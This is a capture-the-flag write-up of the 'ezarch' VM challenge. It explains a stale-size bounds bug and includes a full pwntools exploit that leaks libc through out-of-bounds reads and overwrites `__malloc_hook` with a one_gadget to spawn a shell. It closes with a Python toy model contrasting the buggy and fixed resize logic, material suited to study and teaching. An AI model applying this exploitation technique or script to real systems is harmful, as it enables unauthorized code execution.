# [Pwn] ezarch

cpt.shao, xp0int. Posted on Sep 11 2019.

A fairly simple VM challenge: the instructions are fixed-length, which is pleasant to work with, and the logic is clear. The bug is in the memory reallocation path. When the requested size is larger than 0xa00000, the `size` field has already been updated, but the backing memory of the code segment is not reallocated, so the bounds check now trusts a stale size and we get an out-of-bounds read and write.

![](https://leanote.com/api/file/getImage?fileId=5d750790ab644162bb007215)

The instruction with opcode 3 implements mov. We first put the desired offset into a register and then use mov through that register to do the out-of-bounds read or write. How do we leak an address? When a region of 0x21000 bytes or more is requested, the allocation happens to land right above the TLS mapping, so reading past the end of mem reaches into TLS, which holds libc addresses; from those we can also compute the address of the allocated mem.

A region allocated this way, however, sits below the libc mapping, and with the size limit we can only read and write the memory just past mem.

The challenge actually hands us a hint here: if we allocate exactly 0xa00000 bytes, the allocated region lands right above the libc mapping, so all we have to do is write a one_gadget address over `__malloc_hook` out of bounds and we get a shell.

## exp.py

```
from pwn import *
import re
import sys
import time

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
context.log_level = "debug"
env = {'LD_PRELOAD': ''}

if len(sys.argv) == 1:
    p = process('./ezarch')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])

libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')

se = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(delim, data)
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(delim, data)
sea = lambda delim, data: p.sendafter(delim, data)
rc = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr: p.info(tag + ': {:#x}'.format(addr))


def set_memory(size, content, eip, esp, ebp):
    # "M": allocate the VM memory, upload the program and set the initial registers
    sla(">", "M")
    sla("size>", str(size))
    sla("size>", str(len(content)))
    sea("Now (", content)
    time.sleep(0.1)
    sla("eip>", str(eip))
    sla("esp>", str(esp))
    sla("ebp>", str(ebp))


def do_run():
    sla(">", "R")


def set_bp(addr):
    # "B": set a breakpoint; hitting it dumps the registers, which is our leak channel
    sla(">", "B")
    sla("bp>", str(addr))
    sla("bp>", str(-1))


# Opcode 3 is mov. Every instruction is 10 bytes: opcode, mode, dst (u32), src (u32).
def setreg(dst, src):
    # r[dst] = src (immediate)
    payload = p8(3)
    payload += p8(0x10)
    payload += p32(dst)
    payload += p32(src)
    return payload


def loadmem(dst, src):
    # r[dst] = u32 at mem[r[src]]
    payload = p8(3)
    payload += p8(0x20)
    payload += p32(dst)
    payload += p32(src)
    return payload


def setmem(dst, src):
    # u32 at mem[r[dst]] = src (immediate)
    payload = p8(3)
    payload += p8(0x12)
    payload += p32(dst)
    payload += p32(src)
    return payload


def set_largemem():
    # Request a size above 0xa00000: `size` is updated but the mapping is not,
    # so every later bounds check trusts the stale size.
    sla(">", "M")
    sla("size>", str(0xffffffff))


# Stage 1: 0x21000-byte region, then read past its end into the TLS area
payload = setreg(1, 0x21ff8 + 0x20) + loadmem(2, 1)   # r2 = low half of libc1 (only logged)
payload += setreg(1, 0x21ff4 + 0x20) + loadmem(3, 1)  # r3 = high half of libc1
payload += setreg(1, 0x21ff0) + loadmem(4, 1)         # r4 = low half of libc2
payload += setreg(1, 0x21ff4) + loadmem(5, 1)         # r5 = high half of libc2

set_memory(0x21000, payload, 0, 0, 0)
set_largemem()
set_bp(80)   # right after the 8 instructions (8 * 10 bytes): registers get dumped
do_run()

# leak libc from the register dump
ru("R2 --> ")
libc1 = int(ru("\n"), 16)
ru("R3 --> ")
libc1 += int(ru("\n"), 16) * 0x100000000
info_addr("libc1", libc1)
ru("R4 --> ")
libc2 = int(ru("\n"), 16)
ru("R5 --> ")
libc2 += int(ru("\n"), 16) * 0x100000000
info_addr("libc2", libc2)

libc.address = libc2
base = libc2 - 0xa01000 + 0x10   # where the 0xa00000 region will land, right above libc
info_addr("base", base)
target = libc.symbols['__malloc_hook']
onegadget = libc.address + 0x4f322

# Stage 2: 0xa00000-byte region adjacent to libc; write one_gadget over
# __malloc_hook in two u32 halves
payload = setreg(1, (target - base)) + setmem(1, onegadget & 0xffffffff)
payload += setreg(1, (target - base + 4)) + setmem(1, onegadget >> 32)
# gdb.attach(p, gdbcmd)
set_memory(0xa00000, payload, 0, 0, 0)
set_largemem()
do_run()

# any allocation now goes through __malloc_hook
sla(">", "M")
sla("size>", str(1))
p.interactive()
```
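To make the size/mapping mismatch concrete, here is a small Python model written for this page; it is not the challenge binary and not the author's exploit. It reuses the exploit's 10-byte mov encoding (opcode 3, then modes 0x10, 0x20 and 0x12) with register/immediate/memory semantics inferred from how the exploit uses them, which is an assumption. It implements both resize orders: the buggy one the write-up describes, where `size` is set before the > 0xa00000 check bails out, and a fixed one that only touches `size` together with a successful allocation. The `neighbours` buffer standing in for the TLS area, and the pointer planted in it, are constructed test data.

```python
import struct

MMAP_LIMIT = 0xa00000        # size threshold the write-up names for the buggy path
INSN_LEN = 10                # fixed-length: opcode (1) + mode (1) + dst (u32) + src (u32)
FAKE_LIBC = 0x7f3a1c2e4000   # constructed "leaked" value planted in the neighbour buffer


# Encoders with the same byte layout as the exploit's setreg/loadmem/setmem.
def enc(mode, dst, src):
    return struct.pack("<BBII", 3, mode, dst, src)

def setreg(dst, imm):   return enc(0x10, dst, imm)   # r[dst] = imm          (assumed)
def loadmem(dst, src):  return enc(0x20, dst, src)   # r[dst] = u32 mem[r[src]] (assumed)
def setmem(dst, imm):   return enc(0x12, dst, imm)   # u32 mem[r[dst]] = imm (assumed)


def decode(blob):
    """Split a program into (mode, dst, src) triples, refusing ragged input."""
    if len(blob) % INSN_LEN:
        raise ValueError("program length is not a multiple of %d" % INSN_LEN)
    insns = []
    for off in range(0, len(blob), INSN_LEN):
        op, mode, dst, src = struct.unpack_from("<BBII", blob, off)
        if op != 3:
            raise ValueError("only opcode 3 (mov) is modelled")
        insns.append((mode, dst, src))
    return insns


class VM:
    """Toy VM: one region `mem`, a separate `size` used by the bounds check, and a
    constructed `neighbours` buffer standing in for whatever is mapped after mem."""

    def __init__(self, size, neighbours, hardened=False):
        self.size = size
        self.mem = bytearray(size)
        self.neighbours = neighbours
        self.hardened = hardened
        self.regs = [0] * 8
        self.oob = []              # (kind, offset) for every access that left `mem`

    def resize(self, new_size):
        if self.hardened:
            # Fixed order: reject first, then update size and mapping together.
            if new_size > MMAP_LIMIT:
                return False
            self.mem, self.size = bytearray(new_size), new_size
            return True
        # Buggy order, as the write-up describes it: size is updated before the
        # limit check bails out, so the old mapping stays behind a huge bound.
        self.size = new_size
        if new_size > MMAP_LIMIT:
            return False
        self.mem = bytearray(new_size)
        return True

    def _slot(self, off):
        """Resolve an offset to (buffer, index) after the VM's own bounds check."""
        if off < 0 or off + 4 > self.size:
            raise IndexError("offset %#x rejected by bounds check" % off)
        if off + 4 <= len(self.mem):
            return self.mem, off
        return self.neighbours, off - len(self.mem)   # past the real mapping

    def run(self, program):
        for mode, dst, src in decode(program):
            if mode == 0x10:
                self.regs[dst] = src
            elif mode == 0x20:
                buf, idx = self._slot(self.regs[src])
                if buf is self.neighbours:
                    self.oob.append(("read", self.regs[src]))
                self.regs[dst] = struct.unpack_from("<I", buf, idx)[0]
            elif mode == 0x12:
                buf, idx = self._slot(self.regs[dst])
                if buf is self.neighbours:
                    self.oob.append(("write", self.regs[dst]))
                struct.pack_into("<I", buf, idx, src)
            else:
                raise ValueError("unknown mov mode %#x" % mode)
        return self.regs


def make_neighbours():
    # Constructed stand-in for the TLS area: one 64-bit pointer 0xff0 bytes past the
    # end of mem, matching the 0x21ff0/0x21ff4 offsets the exploit reads from a
    # 0x21000-byte region.
    buf = bytearray(0x2000)
    struct.pack_into("<Q", buf, 0xff0, FAKE_LIBC)
    return buf


def leak(hardened):
    """Stage 1 against the toy VM: the 64-bit value read past the end of mem in two
    u32 halves, or None when the bounds check stops the read."""
    vm = VM(0x21000, make_neighbours(), hardened)
    vm.resize(0xffffffff)        # the "largemem" request; it fails in both variants
    prog = setreg(1, 0x21ff0) + loadmem(4, 1) + setreg(1, 0x21ff4) + loadmem(5, 1)
    try:
        r = vm.run(prog)
    except IndexError:
        return None
    return r[4] | (r[5] << 32)


def overwrite(hardened, off, value):
    """Stage 2: store a 64-bit value at `off` past the end of mem in two u32 halves;
    returns the u64 now held in the neighbour buffer, or None if rejected."""
    vm = VM(0x21000, make_neighbours(), hardened)
    vm.resize(0xffffffff)
    prog = setreg(1, off) + setmem(1, value & 0xffffffff)
    prog += setreg(1, off + 4) + setmem(1, value >> 32)
    try:
        vm.run(prog)
    except IndexError:
        return None
    return struct.unpack_from("<Q", vm.neighbours, off - 0x21000)[0]
```

With the buggy `resize`, `leak(False)` returns the planted pointer and `overwrite(False, ...)` lands in the neighbour buffer, both logged in `vm.oob`; with the fixed order the same programs are stopped by the bounds check, because `size` never outgrew the mapping.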